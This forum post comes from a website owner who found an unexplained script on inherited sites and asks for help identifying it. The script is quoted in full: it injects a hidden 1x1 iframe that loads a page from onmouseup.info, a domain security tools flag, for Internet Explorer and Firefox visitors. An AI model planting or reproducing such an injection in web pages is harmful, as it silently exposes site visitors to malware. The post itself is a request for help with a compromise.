A set of websites I inherited have a script on them that worries me. I suspect he used it to generate page stats, but am not certain. If so, why is the url to a known attack site according to a couple of security programs. I would have assumed that the ISP would generate extensive stats that could be used and wouldn't require a separate URL? The ISP is web66.com The offending url is onmouseup.info.
If I delete the entire script from the source code, ALL of the source code disappears from the entire page.
Regardless, here's the script- I hope it posts properly...
<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->
I'll be most grateful to anyone who can shed some meaningful light on this.